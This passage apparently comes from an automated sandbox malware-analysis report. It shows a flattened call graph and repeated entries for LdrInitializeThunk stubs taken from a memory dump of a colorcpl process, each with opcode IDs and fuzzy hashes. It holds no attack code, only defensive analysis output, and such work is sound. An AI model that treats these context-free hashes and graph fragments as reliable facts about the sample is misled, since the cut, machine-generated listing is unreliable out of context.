20429->20428 20430 6ecfa2b 28 API calls 20429->20430 20431 6ed4636 GetPEB 20429->20431 20430->20429 20441 6ed465f 20431->20441 20442 6ed4642 GetPEB 20431->20442 20440 6e1b150 _vswprintf_s 12 API calls 20432->20440 20439 6e1b150 _vswprintf_s 12 API calls 20433->20439 20435 6ed4796 20437 6ed47aa GetPEB 20435->20437 20438 6ed4830 20435->20438 20436->20425 20444 6ecfa2b 28 API calls 20436->20444 20448 6ed4759 20436->20448 20518 6ec23e3 20436->20518 20450 6ed47b6 GetPEB 20437->20450 20451 6ed47d3 20437->20451 20445 6ed4879 20438->20445 20446 6ed4835 GetPEB 20438->20446 20452 6ed46bd 20439->20452 20440->20452 20449 6e1b150 _vswprintf_s 12 API calls 20441->20449 20447 6e1b150 _vswprintf_s 12 API calls 20442->20447 20444->20436 20445->20425 20466 6ed48a8 20445->20466 20467 6ed48fb GetPEB 20445->20467 20454 6ed485e 20446->20454 20455 6ed4841 GetPEB 20446->20455 20456 6ed465c 20447->20456 20448->20435 20463 6ed4675 20448->20463 20529 6ed4aef 20448->20529 20449->20456 20457 6e1b150 _vswprintf_s 12 API calls 20450->20457 20458 6e1b150 _vswprintf_s 12 API calls 20451->20458 20459 6e1b150 _vswprintf_s 12 API calls 20452->20459 20461 6e1b150 _vswprintf_s 12 API calls 20454->20461 20460 6e1b150 _vswprintf_s 12 API calls 20455->20460 20462 6e1b150 _vswprintf_s 12 API calls 20456->20462 20464 6ed47d0 20457->20464 20458->20464 20459->20463 20460->20464 20461->20464 20462->20463 20463->20423 20469 6e1b150 _vswprintf_s 12 API calls 20464->20469 20465 6ed48dc 20468 6e4174b 13 API calls 20465->20468 20466->20465 20470 6ed494f GetPEB 20466->20470 20471 6ed4924 20467->20471 20472 6ed4907 GetPEB 20467->20472 20468->20425 20469->20463 20473 6ed4978 20470->20473 20474 6ed495b GetPEB 20470->20474 20476 6e1b150 _vswprintf_s 12 API calls 20471->20476 20475 6e1b150 _vswprintf_s 12 API calls 20472->20475 20478 6e1b150 _vswprintf_s 12 API calls 20473->20478 20477 6e1b150 _vswprintf_s 12 API calls 20474->20477 20479 6ed4921 20475->20479 20476->20479 20481 6ed4975 20477->20481 20478->20481 20480 6e1b150 _vswprintf_s 12 API calls 20479->20480 20482 6ed4947 20480->20482 20483 6e1b150 _vswprintf_s 12 API calls 20481->20483 20482->20470 20484 6ed499c 20483->20484 20486 6ed49bc 20485->20486 20487 6ed2e6b 20485->20487 20489 6ed49e4 _vswprintf_s 20486->20489 20589 6e59660 LdrInitializeThunk 20486->20589 20487->20377 20487->20381 20487->20382 20489->20487 20490 6ed4a21 GetPEB 20489->20490 20491 6ed4a2d GetPEB 20490->20491 20492 6ed4a4a 20490->20492 20493 6e1b150 _vswprintf_s 12 API calls 20491->20493 20494 6e1b150 _vswprintf_s 12 API calls 20492->20494 20495 6ed4a47 20493->20495 20494->20495 20496 6e1b150 _vswprintf_s 12 API calls 20495->20496 20497 6ed4a6b 20496->20497 20497->20487 20498 6ed4a9b GetPEB 20497->20498 20499 6ed4ac4 20498->20499 20500 6ed4aa7 GetPEB 20498->20500 20502 6e1b150 _vswprintf_s 12 API calls 20499->20502 20501 6e1b150 _vswprintf_s 12 API calls 20500->20501 20503 6ed4ac1 20501->20503 20502->20503 20504 6e1b150 _vswprintf_s 12 API calls 20503->20504 20504->20487 20506 6ebd4df 20505->20506 20507 6ebd462 20505->20507 20506->20404 20507->20506 20508 6ebd493 20507->20508 20509 6ebd4c5 20507->20509 20590 6e93bd3 20508->20590 20510 6e93bd3 12 API calls 20509->20510 20512 6ebd4c0 20510->20512 20512->20404 20514 6ed30d8 20513->20514 20515 6ed30ca 20513->20515 20514->20362 20516 6e2eb70 33 API calls 20515->20516 20516->20514 20517->20436 20520 6ec23f9 20518->20520 20528 6ec2588 20518->20528 20519 6ec2531 GetPEB 20521 6ec255c 20519->20521 20522 6ec253e GetPEB 20519->20522 20520->20519 20520->20528 20524 6e1b150 _vswprintf_s 12 API calls 20521->20524 20523 6e1b150 _vswprintf_s 12 API calls 20522->20523 20525 6ec2559 20523->20525 20524->20525 20526 6e1b150 _vswprintf_s 12 API calls 20525->20526 20527 6ec2579 GetPEB 20526->20527 20527->20528 20528->20436 20530 6ed4eb2 20529->20530 20549 6ed4b15 20529->20549 20531 6ed50d5 20530->20531 20532 6ed4ec1 GetPEB 20530->20532 20536 6ed50de GetPEB 20531->20536 20554 6ed4f39 20531->20554 20533 6ed50b6 20532->20533 20534 6ed4ed1 GetPEB 20532->20534 20538 6e1b150 _vswprintf_s 12 API calls 20533->20538 20537 6e1b150 _vswprintf_s 12 API calls 20534->20537 20535 6ed5045 GetPEB 20540 6ed506e 20535->20540 20541 6ed5051 GetPEB 20535->20541 20542 6ed50ea GetPEB 20536->20542 20543 6ed5107 20536->20543 20548 6ed4eeb 20537->20548 20538->20548 20539 6ecfa2b 28 API calls 20539->20549 20546 6e1b150 _vswprintf_s 12 API calls 20540->20546 20545 6e1b150 _vswprintf_s 12 API calls 20541->20545 20547 6e1b150 _vswprintf_s 12 API calls 20542->20547 20544 6e1b150 _vswprintf_s 12 API calls 20543->20544 20544->20548 20550 6ed506b 20545->20550 20546->20550 20547->20548 20552 6e1b150 _vswprintf_s 12 API calls 20548->20552 20549->20530 20549->20535 20549->20539 20553 6ec23e3 15 API calls 20549->20553 20549->20554 20555 6eda80d 28 API calls 20549->20555 20556 6ed5001 GetPEB 20549->20556 20559 6ed4ef1 GetPEB 20549->20559 20564 6ed4f88 20549->20564 20566 6e3a229 39 API calls 20549->20566 20575 6e3bc04 28 API calls 20549->20575 20576 6ed4f41 GetPEB 20549->20576 20578 6e3a309 93 API calls 20549->20578 20584 6e3e4a0 28 API calls 20549->20584 20585 6e3e12c 20549->20585 20551 6e1b150 _vswprintf_s 12 API calls 20550->20551 20551->20554 20552->20554 20553->20549 20554->20448 20555->20549 20557 6ed500d GetPEB 20556->20557 20558 6ed502a 20556->20558 20560 6e1b150 _vswprintf_s 12 API calls 20557->20560 20563 6e1b150 _vswprintf_s 12 API calls 20558->20563 20561 6ed4efd GetPEB 20559->20561 20562 6ed4f1a 20559->20562 20567 6ed5027 20560->20567 20568 6e1b150 _vswprintf_s 12 API calls 20561->20568 20569 6e1b150 _vswprintf_s 12 API calls 20562->20569 20563->20567 20564->20554 20565 6ed4f9e GetPEB 20564->20565 20570 6ed4faa GetPEB 20565->20570 20571 6ed4fc7 20565->20571 20566->20549 20567->20535 20577 6ed4f17 20568->20577 20569->20577 20573 6e1b150 _vswprintf_s 12 API calls 20570->20573 20574 6e1b150 _vswprintf_s 12 API calls 20571->20574 20573->20577 20574->20577 20575->20549 20580 6ed4f4d GetPEB 20576->20580 20581 6ed4f6a 20576->20581 20579 6e1b150 _vswprintf_s 12 API calls 20577->20579 20578->20549 20579->20554 20582 6e1b150 _vswprintf_s 12 API calls 20580->20582 20583 6e1b150 _vswprintf_s 12 API calls 20581->20583 20582->20577 20583->20577 20584->20549 20586 6e3e13b 20585->20586 20587 6e3ab40 28 API calls 20586->20587 20588 6e3e153 20586->20588 20587->20586 20588->20549 20589->20489 20591 6e93bf3 20590->20591 20592 6e93c05 20590->20592 20594 6e93c54 20591->20594 20592->20512 20597 6e5e3a0 20594->20597 20600 6e5e3bd 20597->20600 20599 6e5e3b8 20599->20592 20601 6e5e3e3 20600->20601 20602 6e5e3cc 20600->20602 20604 6e5b58e _vswprintf_s 12 API calls 20601->20604 20605 6e5e3d8 _vswprintf_s 20601->20605 20603 6e5b58e _vswprintf_s 12 API calls 20602->20603 20603->20605 20604->20605 20605->20599

                                                                                                Executed Functions

                                                                                                Function 06E596E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 7 6e596e0-6e596ec LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 29928567a818f8ebb61c143efbc7fcf85ac4796cd0dfa12b22f0fff32d1a915f
                                                                                                • Instruction ID: 54c81d684dd6f4ae172dcd3e31cd24df3afcb28244aaf92e46c77f904dd4d7a9
                                                                                                • Opcode Fuzzy Hash: 29928567a818f8ebb61c143efbc7fcf85ac4796cd0dfa12b22f0fff32d1a915f
                                                                                                • Instruction Fuzzy Hash: 4E90027134118C02D150615B880574A00099BD0381F95D411B4534A58D8AD588917161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6 6e59660-6e5966c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: e3c8a723f0a78fbb579f942e704dc89153caed1f7f61127eaf794862108f0a7f
                                                                                                • Instruction ID: 3d18599e7edeec569057ac94b8b3722bfa32efa754f6f4d9f7732a12727b1883
                                                                                                • Opcode Fuzzy Hash: e3c8a723f0a78fbb579f942e704dc89153caed1f7f61127eaf794862108f0a7f
                                                                                                • Instruction Fuzzy Hash: E090027134110C02D1C0715B480564A00099BD1381FD1D015B0135A54DCE558A5977E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b9aca879180e00b39f2183def7a054aacac400ab2465b6e559ce044e4bfa9d90
                                                                                                • Instruction ID: c7fa7dbe74b6e82efc24fe0496cfa96932df9115a516c02158007a776a68c920
                                                                                                • Opcode Fuzzy Hash: b9aca879180e00b39f2183def7a054aacac400ab2465b6e559ce044e4bfa9d90
                                                                                                • Instruction Fuzzy Hash: D190027135124802D150615B880570600099BD1281F91D411B0934958D8AD588917162
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E597A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 10 6e597a0-6e597ac LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 38f0b75dcfe203c4f1bf5afb388ed550f363aac4b9186510d7cdf27276aa6319
                                                                                                • Instruction ID: 976fefbe3f73910dfc4369b3915f56badc80044234ae1701e5b388d095541a6f
                                                                                                • Opcode Fuzzy Hash: 38f0b75dcfe203c4f1bf5afb388ed550f363aac4b9186510d7cdf27276aa6319
                                                                                                • Instruction Fuzzy Hash: 8390026134110403D180715B58196064009EBE1381F91E011F0524954CDD5588566262
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 9 6e59780-6e5978c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6f60c6cbd87823f26851241f987e2406dd5eb2ab719e675d9f0603e39cac8927
                                                                                                • Instruction ID: 5ae0219d8305ac60eccb7faaf55613acb2374fc0c1fe52532b05ae4b8be38935
                                                                                                • Opcode Fuzzy Hash: 6f60c6cbd87823f26851241f987e2406dd5eb2ab719e675d9f0603e39cac8927
                                                                                                • Instruction Fuzzy Hash: FE90026935310402D1C0715B580960A00099BD1282FD1E415B0125958CCD5588696361
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 8 6e59710-6e5971c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: e3079ed03959002e4a6622ac0e0b382addb6bf189ce9b4a4bc30831adcb6c1a1
                                                                                                • Instruction ID: da7af5b5d71bd83993137158f86c1559cf60591fb1e4a8eed5952f6ba3ddb45b
                                                                                                • Opcode Fuzzy Hash: e3079ed03959002e4a6622ac0e0b382addb6bf189ce9b4a4bc30831adcb6c1a1
                                                                                                • Instruction Fuzzy Hash: 6890027134110802D140659B580964600099BE0381F91E011B5134955ECAA588917171
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E595D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 6e595d0-6e595dc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: bd0d536e784e6bddf6b09f4a75fb0608304417e63e3ad0990edf0abef10354e6
                                                                                                • Instruction ID: 5d91e10649473e50761ac10f2e2c81058aa6f2c7d65387833b910052bd5cc69d
                                                                                                • Opcode Fuzzy Hash: bd0d536e784e6bddf6b09f4a75fb0608304417e63e3ad0990edf0abef10354e6
                                                                                                • Instruction Fuzzy Hash: 7E9002A1342104034145715B4815616400E9BE0281B91D021F1124990DC96588917165
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 4 6e59540-6e5954c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6509ea71f9d802ca1dfa19a5cdb932514e992b8ee15574cb5fbaaf9f9297aa2a
                                                                                                • Instruction ID: 080c1113177dc6b9715b4b1e2ddac85cabc3f25dfb8275e6b45d52a00f01d374
                                                                                                • Opcode Fuzzy Hash: 6509ea71f9d802ca1dfa19a5cdb932514e992b8ee15574cb5fbaaf9f9297aa2a
                                                                                                • Instruction Fuzzy Hash: 25900265351104030145A55B0B05507004A9BD53D1391D021F1125950CDA6188616161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ef75c02f4c82b7d4d3cfdd8575c39330c979328531d7dfbf31ef5f90249890c1
                                                                                                • Instruction ID: 027071d71ea3f3701d74725096edd983debc5f93cd3aa095cf018156d32dcdb2
                                                                                                • Opcode Fuzzy Hash: ef75c02f4c82b7d4d3cfdd8575c39330c979328531d7dfbf31ef5f90249890c1
                                                                                                • Instruction Fuzzy Hash: E190026135190442D240656B4C15B0700099BD0383F91D115B0264954CCD5588616561
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 17 6e59a20-6e59a2c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 837cc3576b6877c896b2051a389e287658eea65879a4d65df6a7ddba65db999e
                                                                                                • Instruction ID: 1ccb2060bb877bad1372e6377d1830ed15b71b5ad2fc08cc0516387ddcc2c5db
                                                                                                • Opcode Fuzzy Hash: 837cc3576b6877c896b2051a389e287658eea65879a4d65df6a7ddba65db999e
                                                                                                • Instruction Fuzzy Hash: FF900261741104424180716B8C459064009BFE1291791D121B0AA8950D8999886566A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 16 6e59a00-6e59a0c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 2f08848cbca551359a006cd5a9a40832f436e7f91e4aa6645bb39c7e923156a8
                                                                                                • Instruction ID: c1724149aa0cb23a494738c62beabbfcac9008892a5b75efbba589cf33ac01be
                                                                                                • Opcode Fuzzy Hash: 2f08848cbca551359a006cd5a9a40832f436e7f91e4aa6645bb39c7e923156a8
                                                                                                • Instruction Fuzzy Hash: 0290027134150802D140615B4C1570B00099BD0382F91D011B1274955D8A65885175B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E598F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 13 6e598f0-6e598fc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 2a82fb598bf182c29fe4ddad838decfa931fe7f38c6199b5f34dc60d280d6bdd
                                                                                                • Instruction ID: b8b62fc6a9776ebe7adcd9d86a47eda0c377c7c8028c00c48359739e90decd96
                                                                                                • Opcode Fuzzy Hash: 2a82fb598bf182c29fe4ddad838decfa931fe7f38c6199b5f34dc60d280d6bdd
                                                                                                • Instruction Fuzzy Hash: 5490026174110902D141715B4805616000E9BD02C1FD1D022B1134955ECE658992B171
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 12 6e59860-6e5986c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 1f30aa53f22d91f1c44140c0ed32ab993aaa97fa55ef595ecbe0431891a659e4
                                                                                                • Instruction ID: 1c35bf5bb79b73ba02b23902411d9b7745abff24d7d1a680cb43f265d660877d
                                                                                                • Opcode Fuzzy Hash: 1f30aa53f22d91f1c44140c0ed32ab993aaa97fa55ef595ecbe0431891a659e4
                                                                                                • Instruction Fuzzy Hash: 8E90027134110813D151615B4905707000D9BD02C1FD1D412B0534958D9A968952B161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 11 6e59840-6e5984c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: edfb8dc53b25bfa19db610e5160c78ec43851acf3b1d873de0288e4a21dbd4c4
                                                                                                • Instruction ID: 121ed365bcab57b13e3d7a03ccecfe0f1ef8eb50f2e2de130e0f393067c853c8
                                                                                                • Opcode Fuzzy Hash: edfb8dc53b25bfa19db610e5160c78ec43851acf3b1d873de0288e4a21dbd4c4
                                                                                                • Instruction Fuzzy Hash: DE900261382145525585B15B4805507400AABE02C17D1D012B1524D50C89669856E661
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E599A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 15 6e599a0-6e599ac LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 3b3726394de13ae8440a96409ca488c0979c1a86dbd379702f1cd131e31093a5
                                                                                                • Instruction ID: d8513beadbac5f989c8a603916936598949c89c336fd3ee1b0f2a2177f36a034
                                                                                                • Opcode Fuzzy Hash: 3b3726394de13ae8440a96409ca488c0979c1a86dbd379702f1cd131e31093a5
                                                                                                • Instruction Fuzzy Hash: 669002A138110842D140615B4815B060009DBE1381F91D015F1174954D8A59CC527166
                                                                                                Uniqueness

